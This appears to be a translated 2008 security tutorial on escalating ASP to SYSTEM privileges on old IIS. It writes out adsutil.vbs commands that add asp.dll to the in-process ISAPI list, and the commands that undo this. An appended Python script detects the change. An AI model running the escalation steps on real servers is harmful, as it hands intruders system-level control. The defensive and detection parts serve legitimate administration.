asp.dll elevated to SYSTEM privileges - vulnerability warning - the black bar safety net

ID MYHACK58:62200820592
Type myhack58
Reporter Anonymous
Modified 2008-10-07T00:00:00


There are two methods passed around on the net for raising asp permissions to SYSTEM:

1. In the graphical IIS console: Default Web Site ---> Home Directory ---> set Application Protection to Low. This lets asp run with system permissions, but it is very easy to spot, so the net also circulates a second, more general method: using adsutil.vbs to elevate privileges. That is what I am going to talk about today.

2. Using adsutil.vbs. I have seen many animations and articles on the web that teach this method, but I still have not seen one that explains the principle, so below I give my personal view.

First, an analogy. There is a pack of dogs. A few of them are elder dogs with supreme privilege; the rest have pitiful permissions. Back to the computer: in IIS, several dll files have special privileges, which we can understand as system permissions, just like the elder dogs. asp.dll, the dll that parses asp, is just an ordinary dog with far less authority. So if asp.dll also became an elder dog, asp would have system permissions. Our idea is therefore to add asp.dll to the privileged dll family.

The steps:
<1> First, see which dlls currently hold the privilege.
<2> Add asp.dll to the privileged family.

Now let's go through this in practice.

1) View the privileged dll files. The command is:

cscript adsutil.vbs get /W3SVC/InProcessIsapiApps

It displays:

C:\Inetpub\AdminScripts>cscript adsutil.vbs get /W3SVC/InProcessIsapiApps
Microsoft (R) Windows Script Host version 5.1 for Windows
Copyright(C) Microsoft Corporation 1996-1999. All rights reserved.

InProcessIsapiApps : (LIST) (5 Items)
 "C:\WINNT\system32\idq.dll"
 "C:\WINNT\system32\inetsrv\httpext.dll"
 "C:\WINNT\system32\inetsrv\httpodbc.dll"
 "C:\WINNT\system32\inetsrv\ssinc.dll"
 "C:\WINNT\system32\msw3prt.dll"

See? It tells us the privileged family is: idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll. These few files may differ from machine to machine.

2) Add asp.dll to the privileged family. asp.dll lives at c:\winnt\system32\inetsrv\asp.dll (its location is not necessarily the same on different systems), so we now run:

cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "c:\winnt\system32\inetsrv\asp.dll"

Now you can run cscript adsutil.vbs get /W3SVC/InProcessIsapiApps to check whether it has been added to the list. Note the usage of get and set: one views, the other sets. Also, to run the above you need to be in the C:\Inetpub\AdminScripts> directory.

So if you are an administrator and someone has used this trick on your machine to promote asp to system permissions, the defence is to kick asp.dll out of the privileged family: use the set command to overwrite what was just added. Example:

cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll"

Then, when you check again with cscript adsutil.vbs get /W3SVC/InProcessIsapiApps, if you no longer see asp.dll, asp's permissions have reverted to what they were before.

OK, end of tutorial.
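As an added defender-side example (not part of the original tutorial), the following Python script parses a saved copy of the `get` output, flags any in-process ISAPI dll that is not in a recorded baseline, and builds the `set` line that restores the baseline. The sample output and the baseline list are constructed from the article's listing; record your own machine's clean list instead.

```python
import re

# Constructed sample of `adsutil.vbs get /W3SVC/InProcessIsapiApps` output with asp.dll slipped in.
SAMPLE_OUTPUT = """\
Microsoft (R) Windows Script Host version 5.1 for Windows
Copyright(C) Microsoft Corporation 1996-1999. All rights reserved.

InProcessIsapiApps : (LIST) (6 Items)
 "C:\\WINNT\\system32\\idq.dll"
 "C:\\WINNT\\system32\\inetsrv\\httpext.dll"
 "C:\\WINNT\\system32\\inetsrv\\httpodbc.dll"
 "C:\\WINNT\\system32\\inetsrv\\ssinc.dll"
 "C:\\WINNT\\system32\\msw3prt.dll"
 "c:\\winnt\\system32\\inetsrv\\asp.dll"
"""

# Baseline from the article's clean listing; use your own machine's, since it differs between installs.
BASELINE = [
    r"C:\WINNT\system32\idq.dll",
    r"C:\WINNT\system32\inetsrv\httpext.dll",
    r"C:\WINNT\system32\inetsrv\httpodbc.dll",
    r"C:\WINNT\system32\inetsrv\ssinc.dll",
    r"C:\WINNT\system32\msw3prt.dll",
]

def parse_in_process_list(output):
    """Return the quoted paths under InProcessIsapiApps, in listed order."""
    entries, in_list = [], False
    for line in output.splitlines():
        if line.startswith("InProcessIsapiApps"):
            in_list = True
            continue
        if in_list:
            m = re.match(r'\s*"([^"]+)"\s*$', line)
            if not m:
                break  # first non-item line ends the (LIST) block
            entries.append(m.group(1))
    return entries

def find_unexpected(entries, baseline=BASELINE):
    """Live entries absent from the baseline (Win32 paths compare case-insensitively)."""
    known = {p.lower() for p in baseline}
    return [p for p in entries if p.lower() not in known]

def remediation_command(baseline=BASELINE):
    """The adsutil.vbs set line that overwrites the list with the baseline only."""
    quoted = " ".join('"%s"' % p for p in baseline)
    return "cscript adsutil.vbs set /W3SVC/InProcessIsapiApps " + quoted
```

Run it against the real output (`cscript adsutil.vbs get /W3SVC/InProcessIsapiApps > list.txt`) and treat any unexpected entry as a sign the in-process list has been tampered with.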